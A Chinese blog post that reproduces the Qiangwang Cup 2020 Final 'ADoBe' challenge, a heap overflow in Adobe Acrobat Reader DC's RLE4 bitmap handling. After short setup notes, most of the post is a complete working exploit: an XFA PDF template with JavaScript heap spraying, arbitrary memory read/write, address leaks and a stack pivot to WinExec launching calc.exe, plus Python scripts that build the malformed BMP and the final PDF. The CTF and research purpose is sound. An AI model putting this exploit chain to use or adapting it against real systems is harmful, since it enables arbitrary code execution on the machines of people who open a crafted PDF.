强网杯2020_RealWorld_ADoBe复现

2021-04-10

强网杯2020 Final的RealWorld题，ADoBe复现

膜一下ha1vk师傅，参考ha1vk师傅发在安全客上的文章复现成功的：https://www.anquanke.com/post/id/222391

我是先看的这篇文章：深入分析Adobe忽略了6年的PDF漏洞 https://xlab.tencent.com/cn/2019/09/12/deep-analysis-of-cve-2019-8014/ ，来理解的

上面两篇文章里讲的都很详细了，主要记录下踩坑的地方

踩坑

启动程序

先下载和附件中程序版本一样的Acrobat Reader DC，一开始我本地没有启动成功，但是右键程序的详细信息里能看见版本号，是20.12.20041，所以就去下载相对应的版本，下载地址：ftp://ftp.adobe.com/pub/adobe/reader/win/AcrobatDC/1901220034/，下载en_US的，下载完成后一键安装就好，安装目录会在C:\Program Files (x86)\Adobe下（这时候好像就能成功打开程序的附件了），这时候在根据题目提示修改注册表键值，即HKLM\SOFTWARE\Wow6432Node\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown中修改键值项bProtectedMode（DWORD类型），赋值为0来关闭Adobe Reader DC程序的沙箱，关闭这个沙箱之后，成功启动了题目的附件，比较程序哪里进行了改动的话，用Beyond Compare比较两个文件夹（自己下载的和题目给的）就行

堆喷射一直失败

我按照ha1vk师傅文章中的方法布置堆布局进行堆喷射，结果一直不成功，然后自己也尝试了很久，死活不成功，最后发现是我是用windbg直接起的AcroRd32.exe，这样导致了堆喷射的失败，最后用的办法是先启动AcroRd32.exe，然后用windbg附加上去，这样就成功了，使得程序在处理bmp位图文件的时候申请的堆块落入hole中，然后就能利用程序的漏洞向上溢出修改Array的大小实现任意读写

exp

最后函数的偏移啥的要根据自己机子的情况调整下

template.pdf：

%PDF-1.7
1 0 obj
<<
    /Type /Catalog
    /AcroForm 5 0 R
    /Pages 2 0 R
    /NeedsRendering true
    /Extensions
    <<
        /ADBE
        <<
            /ExtensionLevel 3
            /BaseVersion /1.7
        >>
    >>
>>
endobj
2 0 obj
<<
    /Type /Pages
    /Kids [3 0 R]
    /Count 1
>>
endobj
3 0 obj
<<
    /Type /Page
    /Parent 2 0 R
    /Contents 4 0 R
    /Resources
    <<
        /Font
        <<
            /F1
            <<
                /BaseFont /Helvetica
                /Subtype /Type1
                /Name /F1
            >>
        >>
    >>
>>
endobj
4 0 obj
<<
    /Length 104
>>
stream
BT
/F1 12 Tf
90 692 Td
(If you see this page, it means that your PDF reader does not support XFA.) Tj
ET
endstream
endobj
5 0 obj
<<
    /XFA 6 0 R
>>
endobj
6 0 obj
<<
    /Filter /FlateDecode
    /Length __STREAM_LENGTH__
>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
    <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageSet>
        <pageArea name="Page1" id="Page1">
          <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
          <medium stock="default" short="612pt" long="792pt"/>
        </pageArea>
      </pageSet>
      <subform w="576pt" h="756pt">
        <field name="ImageCrash">
          <ui>
            <imageEdit/>
          </ui>
          <value>
            <image aspect="actual" contentType="image/bmp">
__IMAGE_BASE64_DATA__
            </image>
          </value>
        </field>
      </subform>
      <variables>
        <script name="spray" contentType="application/x-javascript">
           //全局变量
           var size = 300;
           var array = new Array(size);
           var cmd = "C:\\Windows\\System32\\calc.exe";
        </script>
        <?templateDesigner expand 1?>
     </variables>
      <event activity="initialize" name="event__initialize">
        <script contentType="application/x-javascript">
              function fillHeap() {
               var i;
               var j;
               spray.array[0] = new ArrayBuffer(0x130);
               var dv = new DataView(spray.array[0]);
               dv.setUint32(0, 0x11223344, true);
               dv = null;
               for (i = 1; i &lt; spray.array.length; ++i) {
                  spray.array[i] = spray.array[0].slice();
                  //spray.array[i] = new ArrayBuffer(0x130);
                  //var dv = new DataView(spray.array[i]);
                  //dv.setUint32(0,i, true);
               }
              for (j = 0; j &lt; 0x1000; j++) {
                  for (i = spray.size - 1; i &gt; spray.size / 4; i -= 10) {
                     spray.array[i] = null;
                  }
               }
           }
           fillHeap();
           // app.alert("go");
        </script>
      </event>
      <event activity="docReady" ref="$host" name="event__docReady">
        <script contentType="application/x-javascript">
        // The JavaScript code will be executed after triggering the vulnerability
        for (var i = 0; i &lt; spray.array.length; ++i) {
              if (spray.array[i] != null &amp;&amp; spray.array[i].byteLength == -1) {
                //app.alert("found idx=" + i);
                var dv = new DataView(spray.array[i]);
                // 向上搜索内存，查找堆地址
                for(var j = -100;;j -= 4){
                  var x = dv.getUint32(j,true);
                  if(x == 0xf0e0d0c0){
                    // 得到ArrayBuffer自身地址
                    var heap_addr = dv.getUint32(j + 0xc,true) - 0x10 - j;
                    //app.alert("heap_addr = " + heap_addr.toString(16));
                    // 得到dataview地址
                    var dataview_obj_addr = dv.getUint32(-8,true);
                    // app.alert("dataview_obj = " + dataview_obj_addr.toString(16));
                    //得到EScript.api模块的地址
                    var escript_base = dv.getUint32(dataview_obj_addr + 0xC - heap_addr,true) - 0x275510;
                    //app.alert("escript_base=" + escript_base.toString(16));
                    //计算三个重要的函数的iat表
                    var LoadLibraryA_iat = escript_base + 0x1af0d8;
                    var GetProcAddress_iat = escript_base + 0x1af114;
                    var VirtualProtect_iat = escript_base + 0x1af058;
                    //泄露函数地址
                    var LoadLibraryA = dv.getUint32(LoadLibraryA_iat - heap_addr,true);
                    var GetProcAddress = dv.getUint32(GetProcAddress_iat - heap_addr,true);
                    var VirtualProtect = dv.getUint32(VirtualProtect_iat - heap_addr,true);
                    //app.alert("loadlibrary = " + LoadLibraryA.toString(16));
                    var kernel32_base = LoadLibraryA - 0x20bd0;
                    var winexec = kernel32_base + 0x5cd30;
                    // app.alert("debug");
                    var tmp = dv.getUint32(dataview_obj_addr - heap_addr,true);
                    tmp = dv.getUint32(tmp - heap_addr,true);
                    tmp = dv.getUint32(tmp + 0xC - heap_addr,true);
                    //得到一个栈地址
                    //app.alert("tmp = " + tmp.toString(16));
                    var s = dv.getUint32(tmp + 0x8 - heap_addr,true);
                    //搜索栈地址，确定一个稳定的栈地址
                    var stack_addr = 0;
                    for (var k = s;k &gt; s - 0x1000;k -= 4) {
                        x = dv.getUint32(k - heap_addr,true);
                          if (x == escript_base + 0x12e384) {
                            stack_addr = k;
                            //app.alert("found stack_addr=" + stack_addr.toString(16));
                            break;
                          }
                    }
                    pop_rsp_ret = 0x67556 + kernel32_base;
                    var buf = new ArrayBuffer(8);
                    var dv2 = new DataView(buf);
                    dv2.setUint32(0,pop_rsp_ret,true);
                    dv2.setUint32(4,heap_addr+4,true);
                    //var ret_addr = 0xffe0 + stack_addr;
                    var double_value = dv2.getFloat64(0,true);
                    for(var k = 0;k &lt; spray.cmd.length;k++){
                      dv.setUint8(k+32,spray.cmd.charCodeAt(k));
                    }
                    dv.setUint32(16,1,true);    // LPCSTR lpCmdLine, UINT uCmdShow
                    dv.setUint32(12,heap_addr+32,true);
                    dv.setUint32(4,winexec,true);
                    //app.alert("debug");
                    dv.setFloat64(stack_addr-heap_addr,double_value,true);
                  }
                }
                break;
              }
        } 
        app.alert("bad!");    
        </script>
      </event>
    </subform>
  </template>
  <config xmlns="http://www.xfa.org/schema/xci/3.0/">
    <agent name="designer">
      <!--  [0..n]  -->
      <destination>pdf</destination>
      <pdf>
        <!--  [0..n]  -->
        <fontInfo/>
      </pdf>
    </agent>
    <present>
      <!--  [0..n]  -->
      <pdf>
        <!--  [0..n]  -->
        <version>1.7</version>
        <adobeExtensionLevel>5</adobeExtensionLevel>
      </pdf>
      <common/>
      <xdp>
        <packets>*</packets>
      </xdp>
    </present>
  </config>
  <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
    <xfa:data xfa:dataNode="dataGroup"/>
  </xfa:datasets>
  <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
    <annots/>
  </xfdf>
</xdp:xdp>
endstream
endobj
xref
0 7
0000000000 65535 f 
0000000009 00000 n 
0000000237 00000 n 
0000000306 00000 n 
0000000587 00000 n 
0000000746 00000 n 
0000000782 00000 n 
trailer
<<
    /Root 1 0 R
    /Size 7
>>
startxref
__XREF_OFFSET__
%%EOF

gen_bmp.py：

脚本里的WIDTH为0x278对应堆喷射里的0x130大小，因为COMPRESSION = RLE4，故WIDTH*4/8 == 0x13c，程序申请的堆块大小好像是0x140

#-*- coding:utf-8 -*-
import os
import sys
import struct

RLE8 = 1
RLE4 = 2
COMPRESSION = RLE4
BIT_COUNT = 4
CLR_USED = 1 << BIT_COUNT
WIDTH = 0x278
HEIGHT = 1

def get_bitmap_file_header(file_size, bits_offset):
    return struct.pack('<2sIHHI', 'BM', file_size, 0, 0, bits_offset)

def get_bitmap_info_header(data_size):
    return struct.pack('<IIIHHIIIIII',
        0x00000028,
        WIDTH,
        HEIGHT,
        0x0001,
        BIT_COUNT,
        COMPRESSION,
        data_size,
        0x00000000,
        0x00000000,
        CLR_USED,
        0x00000000)

def get_bitmap_info_colors():
    # B, G, R, Reserved
    rgb_quad = '\x00\x00\xFF\x00'
    return rgb_quad * CLR_USED

def get_bitmap_data():

    # set xpos to 0xFFFFFD02
    data = '\x00\x02\xFF\x00' * (0xFFFFFD02 / 0xFF)
    # set xpos to 0xFFFFFD78
    data += '\x00\x02\x76\x00'

    # 0x4 bytes of 0xFF
    data += '\x08\xFF'

    # mark end of bitmap to skip CxxThrowException
    data += '\x00\x01'

    return data

def generate_bitmap(filepath):
    data = get_bitmap_data()
    data_size = len(data)

    bmi_header = get_bitmap_info_header(data_size)
    bmi_colors = get_bitmap_info_colors()

    bmf_header_size = 0x0E
    bits_offset = bmf_header_size + len(bmi_header) + len(bmi_colors)
    file_size = bits_offset + data_size
    bmf_header = get_bitmap_file_header(file_size, bits_offset)
    with open(filepath, 'wb') as f:
        f.write(bmf_header)
        f.write(bmi_header)
        f.write(bmi_colors)
        f.write(data)

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print 'Usage: %s <output.bmp>' % os.path.basename(sys.argv[0])
        sys.exit(1)
    generate_bitmap(sys.argv[1])

gen_pdf.py：

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import os
import sys
import zlib
import base64

def parse_template(template_path):
    with open(template_path, 'rb') as f:
        data = f.read()
    xdp_begin = data.find('<xdp:xdp')
    xdp_end = data.find('</xdp:xdp>') + len('</xdp:xdp>')

    part1 = data[:xdp_begin]
    part2 = data[xdp_begin:xdp_end]
    part3 = data[xdp_end:]
    return part1, part2, part3

def generate_pdf(image_path, template_path, pdf_path):
    pdf_part1, pdf_part2, pdf_part3 = parse_template(template_path)

    with open(image_path, 'rb') as f:
        image_data = base64.b64encode(f.read())
    pdf_part2 = pdf_part2.replace('__IMAGE_BASE64_DATA__', image_data)
    pdf_part2 = zlib.compress(pdf_part2)

    pdf_part1 = pdf_part1.replace('__STREAM_LENGTH__', '%d' % len(pdf_part2))

    pdf_data = pdf_part1 + pdf_part2 + pdf_part3
    pdf_data = pdf_data.replace('__XREF_OFFSET__', '%d' % pdf_data.find('xref'))

    with open(pdf_path, 'wb') as f:
        f.write(pdf_data)

if __name__ == '__main__':
    if len(sys.argv) != 4:
        filename = os.path.basename(sys.argv[0])
        print 'Usage: %s <input.bmp> <template.pdf> <output.pdf>' % filename
        sys.exit(1)
    generate_pdf(sys.argv[1], sys.argv[2], sys.argv[3])

参考链接

深入分析Adobe忽略了6年的PDF漏洞 https://xlab.tencent.com/cn/2019/09/12/deep-analysis-of-cve-2019-8014/

强网杯2020决赛RealWord题ADoBe（ADB）https://www.anquanke.com/post/id/222391